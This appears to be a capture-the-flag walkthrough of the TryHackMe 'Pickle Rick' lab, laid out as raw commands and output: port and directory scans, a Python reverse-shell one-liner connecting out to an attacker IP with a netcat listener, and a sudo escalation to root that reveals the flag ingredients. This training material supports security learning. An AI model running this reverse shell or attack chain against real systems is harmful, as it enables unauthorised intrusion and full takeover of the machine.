nmap -sC -sV -p- 10.10.241.9 -oN nmap.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-18 22:22 IST
Nmap scan report for 10.10.241.9
Host is up (0.17s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b0:7b:e7:02:7d:b7:f0:c7:e9:c3:bc:b4:e8:dd:7f:f3 (RSA)
| 256 23:cb:f6:b0:5b:52:d5:97:96:09:66:40:81:b2:e8:c0 (ECDSA)
|_ 256 36:5a:dc:a0:79:06:c2:3d:51:ab:0b:6a:bb:4d:ce:c5 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 501.79 seconds
Gobuster Enumeration on port 80
$ gobuster dir -u http://10.10.241.9 -t 50 -w /usr/share/wordlists/dirb/common.txt -x php,sh,txt,xml,log,js,cgi,py
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.241.9
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: xml,log,js,cgi,py,php,sh,txt
[+] Timeout: 10s
===============================================================
2021/05/18 23:05:18 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.txt (Status: 403) [Size: 299]
/.htaccess.xml (Status: 403) [Size: 299]
/.htaccess.cgi (Status: 403) [Size: 299]
/.htaccess.php (Status: 403) [Size: 299]
/.htpasswd.php (Status: 403) [Size: 299]
/.htaccess (Status: 403) [Size: 295]
/.htpasswd.js (Status: 403) [Size: 298]
/.htaccess.sh (Status: 403) [Size: 298]
/.htpasswd.cgi (Status: 403) [Size: 299]
/.htaccess.log (Status: 403) [Size: 299]
/.htpasswd.py (Status: 403) [Size: 298]
/.htaccess.js (Status: 403) [Size: 298]
/.htpasswd.txt (Status: 403) [Size: 299]
/.htaccess.py (Status: 403) [Size: 298]
/.htpasswd.xml (Status: 403) [Size: 299]
/.htpasswd (Status: 403) [Size: 295]
/.htpasswd.log (Status: 403) [Size: 299]
/.htpasswd.sh (Status: 403) [Size: 298]
/.hta.js (Status: 403) [Size: 293]
/.hta.py (Status: 403) [Size: 293]
/.hta.php (Status: 403) [Size: 294]
/.hta.txt (Status: 403) [Size: 294]
/.hta.xml (Status: 403) [Size: 294]
/.hta.log (Status: 403) [Size: 294]
/.hta (Status: 403) [Size: 290]
/.hta.cgi (Status: 403) [Size: 294]
/.hta.sh (Status: 403) [Size: 293]
/assets (Status: 301) [Size: 311] [--> http://10.10.241.9/assets/]
/denied.php (Status: 302) [Size: 0] [--> /login.php]
/index.html (Status: 200) [Size: 1062]
/login.php (Status: 200) [Size: 882]
/portal.php (Status: 302) [Size: 0] [--> /login.php]
/robots.txt (Status: 200) [Size: 17]
/server-status (Status: 403) [Size: 299]
===============================================================
2021/05/18 23:07:36 Finished
===============================================================
<!--
Note to self, remember username!
Username: R1ckRul3s
-->
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==
grep . clue.txt
(or)
less clue.txt
(or)
while read line; do echo $line; done < clue.txt
Look around the file system for the other ingredient.
What is the first ingredient Rick needs?
What is the second ingredient Rick needs?
cd /home/rick/; ls -la; grep . "second ingredients"
total 12
drwxrwxrwx 2 root root 4096 Feb 10 2019 .
drwxr-xr-x 4 root root 4096 Feb 10 2019 ..
-rwxrwxrwx 1 root root 13 Feb 10 2019 second ingredients
1 jerry tear
Whats the final ingredient Rick needs?
Attempt 2 - getting reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.7.91",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.17.7.91] from (UNKNOWN) [10.10.36.31] 46354
/bin/sh: 0: cant access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ip-10-10-36-31:/var/www/html$ ^Z
[1]+ Stopped nc -lvnp 1234
root@kali:~/Desktop/CTF/TryHackMe/pickle_rick# stty raw -echo; fg
nc -lvnp 1234
www-data@ip-10-10-36-31:/var/www/html$ export "TERM=xterm"
www-data@ip-10-10-36-31:/var/www/html$ ls
Sup3rS3cretPickl3Ingred.txt clue.txt index.html portal.php
assets denied.php login.php robots.txt
www-data@ip-10-10-36-31:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair
www-data@ip-10-10-36-31:/var/www/html$ sudo -l
Matching Defaults entries for www-data on
ip-10-10-36-31.eu-west-1.compute.internal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on
ip-10-10-36-31.eu-west-1.compute.internal:
(ALL) NOPASSWD: ALL
www-data@ip-10-10-36-31:/var/www/html$ sudo bash
root@ip-10-10-36-31:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@ip-10-10-36-31:/var/www/html# cd
root@ip-10-10-36-31:~# ls
3rd.txt snap
root@ip-10-10-36-31:~# cat 3rd.txt
3rd ingredients: fleeb juice
root@ip-10-10-36-31:~# cd /home/
root@ip-10-10-36-31:/home# ls
rick ubuntu
root@ip-10-10-36-31:/home# cd rick/
root@ip-10-10-36-31:/home/rick# ls
second ingredients
root@ip-10-10-36-31:/home/rick# cat second\ ingredients
1 jerry tear